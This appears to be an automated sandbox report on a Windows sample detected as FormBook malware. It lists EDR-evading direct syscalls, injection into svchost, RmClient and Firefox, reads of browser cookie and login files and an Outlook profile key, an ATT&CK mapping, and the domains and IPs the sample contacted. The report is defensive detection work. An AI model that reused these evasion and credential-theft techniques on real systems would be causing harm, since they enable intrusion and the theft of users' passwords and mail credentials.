            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C6A6 mov eax, dword ptr fs:[00000030h]1_2_0306C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302D6AA mov eax, dword ptr fs:[00000030h]1_2_0302D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302D6AA mov eax, dword ptr fs:[00000030h]1_2_0302D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030276B2 mov eax, dword ptr fs:[00000030h]1_2_030276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030276B2 mov eax, dword ptr fs:[00000030h]1_2_030276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030276B2 mov eax, dword ptr fs:[00000030h]1_2_030276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030666B0 mov eax, dword ptr fs:[00000030h]1_2_030666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A6C7 mov eax, dword ptr fs:[00000030h]1_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303B6C0 mov eax, dword ptr fs:[00000030h]1_2_0303B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303B6C0 mov eax, dword ptr fs:[00000030h]1_2_0303B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303B6C0 mov eax, dword ptr fs:[00000030h]1_2_0303B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303B6C0 mov eax, dword ptr fs:[00000030h]1_2_0303B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303B6C0 mov eax, dword ptr fs:[00000030h]1_2_0303B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303B6C0 mov eax, dword ptr fs:[00000030h]1_2_0303B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F16CC mov eax, dword ptr fs:[00000030h]1_2_030F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F16CC mov eax, dword ptr fs:[00000030h]1_2_030F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F16CC mov eax, dword ptr fs:[00000030h]1_2_030F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F16CC mov eax, dword ptr fs:[00000030h]1_2_030F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EF6C7 mov eax, dword ptr fs:[00000030h]1_2_030EF6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030616CF mov eax, dword ptr fs:[00000030h]1_2_030616CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C36EE mov eax, dword ptr fs:[00000030h]1_2_030C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C36EE mov eax, dword ptr fs:[00000030h]1_2_030C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C36EE mov eax, dword ptr fs:[00000030h]1_2_030C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C36EE mov eax, dword ptr fs:[00000030h]1_2_030C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C36EE mov eax, dword ptr fs:[00000030h]1_2_030C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C36EE mov eax, dword ptr fs:[00000030h]1_2_030C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305D6E0 mov eax, dword ptr fs:[00000030h]1_2_0305D6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305D6E0 mov eax, dword ptr fs:[00000030h]1_2_0305D6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B06F1 mov eax, dword ptr fs:[00000030h]1_2_030B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B06F1 mov eax, dword ptr fs:[00000030h]1_2_030B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030ED6F0 mov eax, dword ptr fs:[00000030h]1_2_030ED6F0

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\w64HYOhfv1.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\RmClient.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: NULL target: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: NULL target: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\RmClient.exeThread register set: target process: 2992Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\RmClient.exeThread APC queued: target process: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\w64HYOhfv1.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 25DF008Jump to behavior
            Source: C:\Users\user\Desktop\w64HYOhfv1.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\w64HYOhfv1.exe"Jump to behavior
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exeProcess created: C:\Windows\SysWOW64\RmClient.exe "C:\Windows\SysWOW64\RmClient.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: ifhdPMDeORMlb.exe, 00000003.00000000.1867459861.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000003.00000002.4129917430.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130177923.0000000001210000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: ifhdPMDeORMlb.exe, 00000003.00000000.1867459861.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000003.00000002.4129917430.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130177923.0000000001210000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: ifhdPMDeORMlb.exe, 00000003.00000000.1867459861.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000003.00000002.4129917430.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130177923.0000000001210000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: ifhdPMDeORMlb.exe, 00000003.00000000.1867459861.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000003.00000002.4129917430.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130177923.0000000001210000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: w64HYOhfv1.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.2660000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2660000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1964041630.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4129418415.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4130342799.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4130314463.0000000002680000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1964459528.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\RmClient.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.2660000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2660000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1964041630.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4129418415.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4130342799.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4130314463.0000000002680000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1964459528.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		2
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		412
            Process Injection            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Abuse Elevation Control Mechanism            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
            Obfuscated Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials12
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529888 Sample: w64HYOhfv1.exe Startdate: 09/10/2024 Architecture: WINDOWS Score: 100 28 www.uburn.xyz 2->28 30 www.nakama2-sshl.xyz 2->30 32 22 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 50 4 other signatures 2->50 10 w64HYOhfv1.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 ifhdPMDeORMlb.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 RmClient.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 ifhdPMDeORMlb.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.uburn.xyz 67.223.117.189, 49423, 49437, 49454 VIMRO-AS15189US United States 22->34 36 www.nakama2-sshl.xyz 183.181.83.131, 49631, 49633, 49634 VECTANTARTERIANetworksCorporationJP Japan 22->36 38 9 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            w64HYOhfv1.exe55%ReversingLabsWin32.Worm.DorkBot
            w64HYOhfv1.exe100%AviraHEUR/AGEN.1321671
            w64HYOhfv1.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.polarmuseum.info
            		199.59.243.227
            		truetrue
              		unknown
              www.uburn.xyz
              		67.223.117.189
              		truetrue
                		unknown
                o731lh.vip
                		3.33.130.190
                		truetrue
                  		unknown
                  newdaydawning.net
                  		44.213.25.70
                  		truetrue
                    		unknown
                    zz82x.top
                    		38.47.232.196
                    		truetrue
                      		unknown
                      tukaari.shop
                      		3.33.130.190
                      		truetrue
                        		unknown
                        40wxd.top
                        		206.119.82.134
                        		truetrue
                          		unknown
                          komart.shop
                          		133.130.35.90
                          		truetrue
                            		unknown
                            www.nakama2-sshl.xyz
                            		183.181.83.131
                            		truetrue
                              		unknown
                              redirect.3dns.box
                              		172.191.244.62
                              		truetrue
                                		unknown
                                healthyloveforall.net
                                		3.33.130.190
                                		truetrue
                                  		unknown
                                  www.prj81oqde1.buzz
                                  		154.212.219.2
                                  		truetrue
                                    		unknown
                                    mommymode.site
                                    		162.241.244.106
                                    		truetrue
                                      		unknown
                                      www.tukaari.shop
                                      		unknown
